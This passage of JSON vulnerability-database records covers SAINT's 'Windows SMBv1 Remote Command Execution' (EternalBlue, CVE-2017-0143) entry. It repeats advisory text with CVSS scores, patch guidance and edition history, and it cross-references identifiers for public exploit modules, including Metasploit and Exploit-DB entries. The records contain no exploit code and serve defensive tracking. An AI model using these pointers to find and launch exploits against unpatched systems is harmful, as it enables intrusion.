SMBv1 was the first version of this protocol and is still supported by modern Windows versions. \n\n### Problem\n\nA vulnerability in the handling of certain SMBv1 requests could allow a remote attacker to execute arbitrary commands. \n\n### Resolution\n\nApply the patch referenced in [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>), or [disable SMBv1](<https://support.microsoft.com/en-us/help/2696547/how-to-enable-and-disable-smbv1,-smbv2,-and-smbv3-in-windows-vista,-windows-server-2008,-windows-7,-windows-server-2008-r2,-windows-8,-and-windows-server-2012>). \n\n### References\n\n<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx> \n\n\n### Limitations\n\nExploit works on Windows 7 and Windows Server 2008 R2. \n\nIf the exploit succeeds against a 32-bit target, the target reboots when the command connection is closed. \n\n### Platforms\n\nWindows 7 \nWindows Server 2008 R2 \n \n\n", "cvelist": ["CVE-2017-0143"], "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/windows_smbv1_eternalblue", "modified": "2017-04-26T00:00:00", "objectVersion": "1.6", "lastseen": "2021-07-28T14:33:33", "scheme": null, "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}}, {"id": "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "bulletinFamily": "exploit", "title": "Windows SMBv1 Remote Command Execution", "description": "Added: 04/26/2017 \nCVE: [CVE-2017-0143](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143>) \nBID: [96703](<http://www.securityfocus.com/bid/96703>) \n\n\n### Background\n\nServer Message Block (SMB) is the protocol used by Microsoft Windows computers to communicate over a network. SMBv1 was the first version of this protocol and is still supported by modern Windows versions. \n\n### Problem\n\nA vulnerability in the handling of certain SMBv1 requests could allow a remote attacker to execute arbitrary commands. \n\n### Resolution\n\nApply the patch referenced in [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>), or [disable SMBv1](<https://support.microsoft.com/en-us/help/2696547/how-to-enable-and-disable-smbv1,-smbv2,-and-smbv3-in-windows-vista,-windows-server-2008,-windows-7,-windows-server-2008-r2,-windows-8,-and-windows-server-2012>). \n\n### References\n\n<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx> \n\n\n### Limitations\n\nExploit works on Windows 7 and Windows Server 2008 R2. \n\nIf the exploit succeeds against a 32-bit target, the target reboots when the command connection is closed. \n\n### Platforms\n\nWindows 7 \nWindows Server 2008 R2 \n \n\n", "published": "2017-04-26T00:00:00", "modified": "2017-04-26T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/windows_smbv1_eternalblue", "reporter": "SAINT Corporation", "references": [], "cvelist": ["CVE-2017-0143"], "type": "saint", "lastseen": "2021-07-29T16:40:11", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Added: 04/26/2017 \nCVE: [CVE-2017-0143](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143>) \nBID: [96703](<http://www.securityfocus.com/bid/96703>) \n\n\n### Background\n\nServer Message Block (SMB) is the protocol used by Microsoft Windows computers to communicate over a network. SMBv1 was the first version of this protocol and is still supported by modern Windows versions. \n\n### Problem\n\nA vulnerability in the handling of certain SMBv1 requests could allow a remote attacker to execute arbitrary commands. \n\n### Resolution\n\nApply the patch referenced in [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>), or [disable SMBv1](<https://support.microsoft.com/en-us/help/2696547/how-to-enable-and-disable-smbv1,-smbv2,-and-smbv3-in-windows-vista,-windows-server-2008,-windows-7,-windows-server-2008-r2,-windows-8,-and-windows-server-2012>). \n\n### References\n\n<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx> \n\n\n### Limitations\n\nExploit works on Windows 7 and Windows Server 2008 R2. \n\nIf the exploit succeeds against a 32-bit target, the target reboots when the command connection is closed. \n\n### Platforms\n\nWindows 7 \nWindows Server 2008 R2 \n \n\n", "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "d6fe647cb4ebd5763d03a0356ecaf674eb43f399c7c95e6f750eb94527b9c092", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "b3eb3e5939e1290e443adbd9dcd4d55f", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "9347e214aa74471d67b0cec25114c5c9", "key": "published"}, {"hash": "9347e214aa74471d67b0cec25114c5c9", "key": "modified"}, {"hash": "a2e6da74c8b179f121f93bda28c97a91", "key": "reporter"}, {"hash": "bd676e3751a4d110eaa275bf92ca7e46", "key": "href"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": "46cfe8ba7ece1f650e5f50e76a93bd99", "key": "description"}, {"hash": "2a4c1f6b0cd88cf3fac4b56bd4283522", "key": "type"}], "history": [], "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/windows_smbv1_eternalblue", "id": "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "lastseen": "2017-05-02T17:21:23", "modified": "2017-04-26T00:00:00", "objectVersion": "1.2", "published": "2017-04-26T00:00:00", "references": [], "reporter": "SAINT Corporation", "title": "Windows SMBv1 Remote Command Execution", "type": "saint", "viewCount": 27}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2017-05-02T17:21:23"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0143"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Added: 04/26/2017 \nCVE: [CVE-2017-0143](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143>) \nBID: [96703](<http://www.securityfocus.com/bid/96703>) \n\n\n### Background\n\nServer Message Block (SMB) is the protocol used by Microsoft Windows computers to communicate over a network. SMBv1 was the first version of this protocol and is still supported by modern Windows versions. \n\n### Problem\n\nA vulnerability in the handling of certain SMBv1 requests could allow a remote attacker to execute arbitrary commands. \n\n### Resolution\n\nApply the patch referenced in [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>), or [disable SMBv1](<https://support.microsoft.com/en-us/help/2696547/how-to-enable-and-disable-smbv1,-smbv2,-and-smbv3-in-windows-vista,-windows-server-2008,-windows-7,-windows-server-2008-r2,-windows-8,-and-windows-server-2012>). \n\n### References\n\n<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx> \n\n\n### Limitations\n\nExploit works on Windows 7 and Windows Server 2008 R2. \n\nIf the exploit succeeds against a 32-bit target, the target reboots when the command connection is closed. \n\n### Platforms\n\nWindows 7 \nWindows Server 2008 R2 \n \n\n", "edition": 3, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "a3dcfe59f9e4d59fc298dfba20cdcedfd41940b643f793b54f3cf0eeab2a8151", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "b3eb3e5939e1290e443adbd9dcd4d55f", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "9347e214aa74471d67b0cec25114c5c9", "key": "published"}, {"hash": "9347e214aa74471d67b0cec25114c5c9", "key": "modified"}, {"hash": "a2e6da74c8b179f121f93bda28c97a91", "key": "reporter"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bd676e3751a4d110eaa275bf92ca7e46", "key": "href"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": "46cfe8ba7ece1f650e5f50e76a93bd99", "key": "description"}, {"hash": "2a4c1f6b0cd88cf3fac4b56bd4283522", "key": "type"}], "history": [], "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/windows_smbv1_eternalblue", "id": "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "lastseen": "2018-08-30T20:07:51", "modified": "2017-04-26T00:00:00", "objectVersion": "1.3", "published": "2017-04-26T00:00:00", "references": [], "reporter": "SAINT Corporation", "title": "Windows SMBv1 Remote Command Execution", "type": "saint", "viewCount": 27}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-08-30T20:07:51"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "description": "Added: 04/26/2017 \nCVE: [CVE-2017-0143](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143>) \nBID: [96703](<http://www.securityfocus.com/bid/96703>) \n\n\n### Background\n\nServer Message Block (SMB) is the protocol used by Microsoft Windows computers to communicate over a network. SMBv1 was the first version of this protocol and is still supported by modern Windows versions. \n\n### Problem\n\nA vulnerability in the handling of certain SMBv1 requests could allow a remote attacker to execute arbitrary commands. \n\n### Resolution\n\nApply the patch referenced in [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>), or [disable SMBv1](<https://support.microsoft.com/en-us/help/2696547/how-to-enable-and-disable-smbv1,-smbv2,-and-smbv3-in-windows-vista,-windows-server-2008,-windows-7,-windows-server-2008-r2,-windows-8,-and-windows-server-2012>). \n\n### References\n\n<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx> \n\n\n### Limitations\n\nExploit works on Windows 7 and Windows Server 2008 R2. \n\nIf the exploit succeeds against a 32-bit target, the target reboots when the command connection is closed. \n\n### Platforms\n\nWindows 7 \nWindows Server 2008 R2 \n \n\n", "edition": 5, "enchantments": {"dependencies": {"modified": "2019-06-04T23:19:33", "references": [{"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"], "type": "ics"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"], "type": "threatpost"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["CVE-2017-0143"], "type": "cve"}, {"idList": ["MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["SMNTC-96703"], "type": "symantec"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2019-06-04T23:19:33", "rev": 2, "value": 8.6, "vector": "NONE"}}, "hash": "d269053c62cefd10023cf015414dc70236e9faafa018b4e9fae3eecc11db84ac", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "b3eb3e5939e1290e443adbd9dcd4d55f", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "9347e214aa74471d67b0cec25114c5c9", "key": "published"}, {"hash": "9347e214aa74471d67b0cec25114c5c9", "key": "modified"}, {"hash": "a2e6da74c8b179f121f93bda28c97a91", "key": "reporter"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "bd676e3751a4d110eaa275bf92ca7e46", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": "46cfe8ba7ece1f650e5f50e76a93bd99", "key": "description"}, {"hash": "2a4c1f6b0cd88cf3fac4b56bd4283522", "key": "type"}], "history": [], "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/windows_smbv1_eternalblue", "id": "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "immutableFields": [], "lastseen": "2019-06-04T23:19:33", "modified": "2017-04-26T00:00:00", "objectVersion": "1.5", "published": "2017-04-26T00:00:00", "references": [], "reporter": "SAINT Corporation", "title": "Windows SMBv1 Remote Command Execution", "type": "saint", "viewCount": 309}, "different_elements": ["cvss3", "cvss2"], "edition": 5, "lastseen": "2019-06-04T23:19:33"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Added: 04/26/2017 \nCVE: [CVE-2017-0143](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143>) \nBID: [96703](<http://www.securityfocus.com/bid/96703>) \n\n\n### Background\n\nServer Message Block (SMB) is the protocol used by Microsoft Windows computers to communicate over a network. SMBv1 was the first version of this protocol and is still supported by modern Windows versions. \n\n### Problem\n\nA vulnerability in the handling of certain SMBv1 requests could allow a remote attacker to execute arbitrary commands. \n\n### Resolution\n\nApply the patch referenced in [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>), or [disable SMBv1](<https://support.microsoft.com/en-us/help/2696547/how-to-enable-and-disable-smbv1,-smbv2,-and-smbv3-in-windows-vista,-windows-server-2008,-windows-7,-windows-server-2008-r2,-windows-8,-and-windows-server-2012>). \n\n### References\n\n<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx> \n\n\n### Limitations\n\nExploit works on Windows 7 and Windows Server 2008 R2. \n\nIf the exploit succeeds against a 32-bit target, the target reboots when the command connection is closed. \n\n### Platforms\n\nWindows 7 \nWindows Server 2008 R2 \n \n\n", "edition": 4, "enchantments": {"dependencies": {"modified": "2018-08-31T00:08:18", "references": [{"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"], "type": "threatpost"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["CVE-2017-0143"], "type": "cve"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["SMNTC-96703"], "type": "symantec"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:142548"], "type": "packetstorm"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "hash": "d6fe647cb4ebd5763d03a0356ecaf674eb43f399c7c95e6f750eb94527b9c092", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "b3eb3e5939e1290e443adbd9dcd4d55f", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "9347e214aa74471d67b0cec25114c5c9", "key": "published"}, {"hash": "9347e214aa74471d67b0cec25114c5c9", "key": "modified"}, {"hash": "a2e6da74c8b179f121f93bda28c97a91", "key": "reporter"}, {"hash": "bd676e3751a4d110eaa275bf92ca7e46", "key": "href"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": "46cfe8ba7ece1f650e5f50e76a93bd99", "key": "description"}, {"hash": "2a4c1f6b0cd88cf3fac4b56bd4283522", "key": "type"}], "history": [], "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/windows_smbv1_eternalblue", "id": "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "lastseen": "2018-08-31T00:08:18", "modified": "2017-04-26T00:00:00", "objectVersion": "1.3", "published": "2017-04-26T00:00:00", "references": [], "reporter": "SAINT Corporation", "title": "Windows SMBv1 Remote Command Execution", "type": "saint", "viewCount": 41}, "differentElements": ["cvss"], "edition": 4, "lastseen": "2018-08-31T00:08:18"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Added: 04/26/2017 \nCVE: [CVE-2017-0143](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143>) \nBID: [96703](<http://www.securityfocus.com/bid/96703>) \n\n\n### Background\n\nServer Message Block (SMB) is the protocol used by Microsoft Windows computers to communicate over a network. SMBv1 was the first version of this protocol and is still supported by modern Windows versions. \n\n### Problem\n\nA vulnerability in the handling of certain SMBv1 requests could allow a remote attacker to execute arbitrary commands. \n\n### Resolution\n\nApply the patch referenced in [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>), or [disable SMBv1](<https://support.microsoft.com/en-us/help/2696547/how-to-enable-and-disable-smbv1,-smbv2,-and-smbv3-in-windows-vista,-windows-server-2008,-windows-7,-windows-server-2008-r2,-windows-8,-and-windows-server-2012>). \n\n### References\n\n<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx> \n\n\n### Limitations\n\nExploit works on 64-bit versions of Windows 7 and Windows Server 2008 R2. \n\n### Platforms\n\nWindows 7 \nWindows Server 2008 R2 \n \n\n", "edition": 1, "hash": "b6fd1763e0cc46e1dd61da06e65309dec54b34ab00f44652a090d2052cf220c8", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "b3eb3e5939e1290e443adbd9dcd4d55f", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "9347e214aa74471d67b0cec25114c5c9", "key": "published"}, {"hash": "9347e214aa74471d67b0cec25114c5c9", "key": "modified"}, {"hash": "a2e6da74c8b179f121f93bda28c97a91", "key": "reporter"}, {"hash": "bd676e3751a4d110eaa275bf92ca7e46", "key": "href"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": "2a4c1f6b0cd88cf3fac4b56bd4283522", "key": "type"}, {"hash": "b585fb8d48395d7459f226680992c33c", "key": "description"}], "history": [], "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/windows_smbv1_eternalblue", "id": "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "lastseen": "2017-05-01T21:21:19", "modified": "2017-04-26T00:00:00", "objectVersion": "1.2", "published": "2017-04-26T00:00:00", "references": [], "reporter": "SAINT Corporation", "title": "Windows SMBv1 Remote Command Execution", "type": "saint", "viewCount": 3}, "differentElements": ["description"], "edition": 1, "lastseen": "2017-05-01T21:21:19"}], "edition": 6, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "67164609e54a9c48368f8c8211098c3c"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "46cfe8ba7ece1f650e5f50e76a93bd99"}, {"key": "href", "hash": "bd676e3751a4d110eaa275bf92ca7e46"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "9347e214aa74471d67b0cec25114c5c9"}, {"key": "published", "hash": "9347e214aa74471d67b0cec25114c5c9"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a2e6da74c8b179f121f93bda28c97a91"}, {"key": "title", "hash": "b3eb3e5939e1290e443adbd9dcd4d55f"}, {"key": "type", "hash": "2a4c1f6b0cd88cf3fac4b56bd4283522"}], "hash": "039f4527c7142d8fb25e10bb6ab587ec892e0bcd8fa231fd4da30f194f5193d6", "viewCount": 349, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33895"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", 